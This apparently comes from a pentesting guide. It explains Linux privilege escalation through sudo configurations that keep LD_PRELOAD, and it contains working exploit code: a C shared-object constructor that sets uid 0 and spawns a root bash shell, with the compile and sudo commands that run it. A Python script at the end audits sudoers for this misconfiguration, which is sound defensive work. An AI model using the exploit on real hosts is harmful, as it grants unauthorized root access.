
Sudo Privilege Escalation by Overriding Shared Library

A sudo configuration that preserves the LD_PRELOAD or LD_LIBRARY_PATH environment variables might be vulnerable to privilege escalation (PrivEsc).


Last updated 1 year ago

Check sudo commands.

sudo -l

Below is an example of the output.

env_keep+=LD_PRELOAD

(ALL : ALL) NOPASSWD: somecmd

If the sudo configuration keeps the LD_PRELOAD environment variable, we can set this variable to load our custom shared object and escalate privileges.

The same applies when LD_LIBRARY_PATH is kept instead of LD_PRELOAD.

To list the shared libraries required by the executable, use the ldd command.

ldd somecmd

First, create exploit.c under /tmp.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs automatically when the shared object is loaded, before main(). */
void inject() __attribute__((constructor));

void inject() {
	/* Remove the variable so the spawned shell does not preload this library again. */
	unsetenv("LD_PRELOAD");
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
  • The "constructor" attribute is a special type of function attribute in GCC. It tells the compiler to call the function automatically before the main function runs.

Now compile the C program into a shared object.

# -fPIC: Generate Position Independent Code.
# -shared: Generate a shared library.
# -o: Output shared object.
gcc -fPIC -shared -o exploit.so exploit.c

Run the command with LD_PRELOAD set to the shared library; the constructor then spawns a root shell.

sudo LD_PRELOAD=/tmp/exploit.so somecmd
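As an added example (not part of the original page), a small Python audit that replays the env_keep directives from /etc/sudoers or from `sudo -l` output and reports whether LD_PRELOAD or LD_LIBRARY_PATH survive, so an administrator can spot this misconfiguration before anyone abuses it. The sample inputs, the user alice and the host name are constructed.

```python
import re

# Variables the dynamic loader honours; if sudo preserves them, a permitted
# command can be made to load attacker-controlled code.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")

# Matches env_keep settings in both sudoers syntax and `sudo -l` output, e.g.
#   Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
#   env_reset, env_keep+=LD_PRELOAD, secure_path=...
ENV_KEEP_RE = re.compile(r'env_keep\s*([+-]?=)\s*(?:"([^"]*)"|([^\s,]+))')


def kept_env_vars(text):
    """Replay every env_keep directive in order and return {var: line_no} for
    the variables still kept at the end ('=' replaces the list, '+=' adds,
    '-=' removes).  Defaults scopes (Defaults:user etc.) are deliberately not
    distinguished: any scope that keeps a variable is reported."""
    kept = {}
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]          # drop trailing comments
        for op, quoted, bare in ENV_KEEP_RE.findall(line):
            names = (quoted or bare).split()
            if op == "=":
                kept = {}
            for name in names:
                if op == "-=":
                    kept.pop(name, None)
                else:
                    kept[name] = no
    return kept


def risky_loader_vars(text):
    """Return {var: line_no} for LD_PRELOAD / LD_LIBRARY_PATH that are kept."""
    kept = kept_env_vars(text)
    return {v: kept[v] for v in LOADER_VARS if v in kept}


# Constructed sample inputs (not taken from a real host).
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "LANG LC_ALL"
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"   # dangerous
Defaults env_keep -= "LD_LIBRARY_PATH"
alice ALL=(ALL : ALL) NOPASSWD: /usr/bin/somecmd
"""
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/bin:/bin
User alice may run the following commands on host:
    (ALL : ALL) NOPASSWD: somecmd
"""

if __name__ == "__main__":
    for label, text in (("sudoers", SAMPLE_SUDOERS), ("sudo -l", SAMPLE_SUDO_L)):
        for var, no in risky_loader_vars(text).items():
            print(f"[{label}] line {no}: sudo keeps {var}; remove it from env_keep")
```

Feed it the real file (`sudo cat /etc/sudoers /etc/sudoers.d/*`) or the text of `sudo -l` to audit a host; an empty result means neither loader variable is preserved.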